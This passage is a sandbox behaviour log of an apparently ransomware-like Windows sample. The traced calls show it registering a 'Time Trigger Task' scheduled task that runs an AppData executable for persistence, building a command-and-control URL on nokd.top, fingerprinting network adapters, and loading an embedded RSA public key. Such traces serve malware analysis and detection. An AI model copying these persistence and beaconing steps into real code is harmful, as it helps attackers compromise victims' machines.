Flags=0x0, Size=0xc) returned 0x3339040 [0104.650] IExecAction:put_Path (This=0x2900c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 0x0 [0104.650] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.650] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.650] IExecAction:put_Arguments (This=0x2900c98, Arguments="--Task") returned 0x0 [0104.651] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.651] IUnknown:Release (This=0x2900c98) returned 0x1 [0104.651] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc) returned 0x3339040 [0104.651] ITaskFolder:RegisterTaskDefinition (in: This=0x2900920, Path="Time Trigger Task", pDefinition=0x2900950, flags=6, UserId=0x18cd18*(varType=0x0, wReserved1=0x333, wReserved2=0xd22c, wReserved3=0x18, varVal1=0x420cab, varVal2=0x730000), password=0x18cd28*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18cd3c*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18d244 | out: ppTask=0x18d244*=0x2900d18) returned 0x0 [0104.736] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3339040 | out: hHeap=0x730000) returned 1 [0104.737] TaskScheduler:IUnknown:Release (This=0x2900920) returned 0x0 [0104.737] TaskScheduler:IUnknown:Release (This=0x2900950) returned 0x0 [0104.737] IUnknown:Release (This=0x2900d18) returned 0x0 [0104.737] CoUninitialize () [0104.737] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f5530 | out: hHeap=0x730000) returned 1 [0104.737] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f52a8 | out: hHeap=0x730000) returned 1 [0104.738] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f50f8 | out: hHeap=0x730000) returned 1 [0104.738] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7869b8 [0104.738] OpenServiceW (hSCManager=0x7869b8, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0104.738] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x40) returned 0x3324058 [0104.738] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3332338 [0104.738] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3331c98 [0104.738] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33327d8 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3332a40 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3332ca8 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3332f10 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334df80 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334e1e8 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334e450 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334e6b8 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334e920 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334eb88 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334edf0 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334f058 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334f2c0 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334f528 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xa0) returned 0x32e7f98 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x110) returned 0x3331f00 [0104.739] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32e7f98 | out: hHeap=0x730000) returned 1 [0104.739] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x110) returned 0x3344e20 [0104.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x33393c8, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x864) returned 0x5b8 [0105.029] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3331f00 | out: hHeap=0x730000) returned 1 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x3364820 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334f790 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334f9f8 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334fc60 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x334fec8 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350130 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350398 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350600 [0105.029] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350868 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350ad0 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3350d38 [0105.030] lstrlenA (lpString="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x5e) returned 0x820dc0 [0105.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x334f790, cbMultiByte=-1, lpWideCharStr=0x820dc0, cchWideChar=47 | out: lpWideCharStr="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0105.030] lstrcatW (in: lpString1="", lpString2="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.030] lstrlenA (lpString="") returned 0 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d31f0 [0105.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x334f9f8, cbMultiByte=-1, lpWideCharStr=0x32d31f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.030] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.030] lstrlenA (lpString="") returned 0 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d31c0 [0105.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x334fc60, cbMultiByte=-1, lpWideCharStr=0x32d31c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.030] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.030] lstrlenA (lpString="") returned 0 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3260 [0105.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x334fec8, cbMultiByte=-1, lpWideCharStr=0x32d3260, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.030] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.030] lstrlenA (lpString="") returned 0 [0105.030] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3210 [0105.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350130, cbMultiByte=-1, lpWideCharStr=0x32d3210, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.030] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenA (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3220 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350398, cbMultiByte=-1, lpWideCharStr=0x32d3220, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.031] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenA (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3280 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350600, cbMultiByte=-1, lpWideCharStr=0x32d3280, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.031] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenA (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3230 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350868, cbMultiByte=-1, lpWideCharStr=0x32d3230, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.031] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenA (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3240 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350ad0, cbMultiByte=-1, lpWideCharStr=0x32d3240, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.031] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenA (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x2) returned 0x32d3250 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3350d38, cbMultiByte=-1, lpWideCharStr=0x32d3250, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.031] lstrcatW (in: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://nokd.top/ydtftysdtyftysdfsdpen3/get.php" [0105.031] lstrlenW (lpString="") returned 0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x12) returned 0x755de0 [0105.031] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x288) returned 0x3333178 [0105.032] GetAdaptersInfo (in: AdapterInfo=0x3333178, SizePointer=0x18d25c | out: AdapterInfo=0x3333178, SizePointer=0x18d25c) returned 0x0 [0105.133] GetAdaptersInfo (in: AdapterInfo=0x3333178, SizePointer=0x18d25c | out: AdapterInfo=0x3333178, SizePointer=0x18d25c) returned 0x0 [0105.146] GetLastError () returned 0x0 [0105.155] GetLastError () returned 0x0 [0105.156] CryptAcquireContextW (in: phProv=0x18d22c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d22c*=0x790f48) returned 1 [0105.205] CryptCreateHash (in: hProv=0x790f48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d234 | out: phHash=0x18d234) returned 1 [0105.205] CryptHashData (hHash=0x334ad00, pbData=0x336acf8, dwDataLen=0x11, dwFlags=0x0) returned 1 [0105.205] CryptGetHashParam (in: hHash=0x334ad00, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d230, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d230) returned 1 [0105.205] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x11) returned 0x3314118 [0105.205] CryptGetHashParam (in: hHash=0x334ad00, dwParam=0x2, pbData=0x3314118, pdwDataLen=0x18d230, dwFlags=0x0 | out: pbData=0x3314118, pdwDataLen=0x18d230) returned 1 [0105.205] GetLastError () returned 0x0 [0105.205] CryptDestroyHash (hHash=0x334ad00) returned 1 [0105.205] CryptReleaseContext (hProv=0x790f48, dwFlags=0x0) returned 1 [0105.205] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x336acf8 | out: hHeap=0x730000) returned 1 [0105.205] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33129e0 [0105.205] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3312740 | out: hHeap=0x730000) returned 1 [0105.205] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x336acd0 | out: hHeap=0x730000) returned 1 [0105.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x874) returned 0x5d8 [0105.487] WaitForSingleObject (hHandle=0x5d8, dwMilliseconds=0xffffffff) returned 0x0 [0107.764] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x660 [0107.764] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x28) returned 0x3391060 [0107.764] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3351470 [0107.764] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x33516d8 [0107.764] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3351940 [0107.764] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x3351ba8 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339df20 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339e188 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339e3f0 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339e658 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339e8c0 [0107.765] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x25c) returned 0x339eb28 [0107.766] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x3f0) returned 0x33a1f08 [0107.766] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x5f1) returned 0x33a2300 [0107.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x33a2300, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0107.766] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x600) returned 0x33a2900 [0107.766] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2300 | out: hHeap=0x730000) returned 1 [0107.766] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a1f08 | out: hHeap=0x730000) returned 1 [0107.774] CryptAcquireContextW (in: phProv=0x18d29c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d29c*=0x791410) returned 1 [0108.131] CryptCreateHash (in: hProv=0x791410, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d2a0 | out: phHash=0x18d2a0) returned 1 [0108.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0108.131] CryptHashData (hHash=0x338e7e0, pbData=0x33a2900, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0108.131] CryptGetHashParam (in: hHash=0x338e7e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d2a4, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d2a4) returned 1 [0108.131] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x11) returned 0x33152f8 [0108.131] CryptGetHashParam (in: hHash=0x338e7e0, dwParam=0x2, pbData=0x33152f8, pdwDataLen=0x18d2a4, dwFlags=0x0 | out: pbData=0x33152f8, pdwDataLen=0x18d2a4) returned 1 [0108.131] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x34) returned 0x338e860 [0108.131] GetLastError () returned 0x0 [0108.131] lstrcatA (in: lpString1="", lpString2="C2" | out: lpString1="C2") returned="C2" [0108.131] GetLastError () returned 0x0 [0108.131] lstrcatA (in: lpString1="C2", lpString2="2D" | out: lpString1="C22D") returned="C22D" [0108.131] GetLastError () returned 0x0 [0108.131] lstrcatA (in: lpString1="C22D", lpString2="9B" | out: lpString1="C22D9B") returned="C22D9B" [0108.131] GetLastError () returned 0x0 [0108.131] lstrcatA (in: lpString1="C22D9B", lpString2="95" | out: lpString1="C22D9B95") returned="C22D9B95" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B95", lpString2="40" | out: lpString1="C22D9B9540") returned="C22D9B9540" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540", lpString2="A5" | out: lpString1="C22D9B9540A5") returned="C22D9B9540A5" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A5", lpString2="66" | out: lpString1="C22D9B9540A566") returned="C22D9B9540A566" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566", lpString2="CF" | out: lpString1="C22D9B9540A566CF") returned="C22D9B9540A566CF" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CF", lpString2="E7" | out: lpString1="C22D9B9540A566CFE7") returned="C22D9B9540A566CFE7" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CFE7", lpString2="B5" | out: lpString1="C22D9B9540A566CFE7B5") returned="C22D9B9540A566CFE7B5" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CFE7B5", lpString2="6F" | out: lpString1="C22D9B9540A566CFE7B56F") returned="C22D9B9540A566CFE7B56F" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F", lpString2="54" | out: lpString1="C22D9B9540A566CFE7B56F54") returned="C22D9B9540A566CFE7B56F54" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F54", lpString2="25" | out: lpString1="C22D9B9540A566CFE7B56F5425") returned="C22D9B9540A566CFE7B56F5425" [0108.132] GetLastError () returned 0x0 [0108.132] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F5425", lpString2="87" | out: lpString1="C22D9B9540A566CFE7B56F542587") returned="C22D9B9540A566CFE7B56F542587" [0108.132] GetLastError () returned 0x0 [0108.133] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587", lpString2="A1" | out: lpString1="C22D9B9540A566CFE7B56F542587A1") returned="C22D9B9540A566CFE7B56F542587A1" [0108.133] GetLastError () returned 0x0 [0108.133] lstrcatA (in: lpString1="C22D9B9540A566CFE7B56F542587A1", lpString2="9C" | out: lpString1="C22D9B9540A566CFE7B56F542587A19C") returned="C22D9B9540A566CFE7B56F542587A19C" [0108.133] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33152f8 | out: hHeap=0x730000) returned 1 [0108.133] CryptDestroyHash (hHash=0x338e7e0) returned 1 [0108.133] CryptReleaseContext (hProv=0x791410, dwFlags=0x0) returned 1 [0108.133] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2900 | out: hHeap=0x730000) returned 1 [0108.133] lstrlenA (lpString="C22D9B9540A566CFE7B56F542587A19C") returned 32 [0108.133] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x3f0) returned 0x33a2600 [0108.133] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x5f1) returned 0x33a29f8 [0108.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x33a29f8, cbMultiByte=1521, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 498 [0108.133] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x600) returned 0x33a2ff8 [0108.133] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a29f8 | out: hHeap=0x730000) returned 1 [0108.134] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2600 | out: hHeap=0x730000) returned 1 [0108.134] lstrcpyA (in: lpString1=0x33393e8, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC 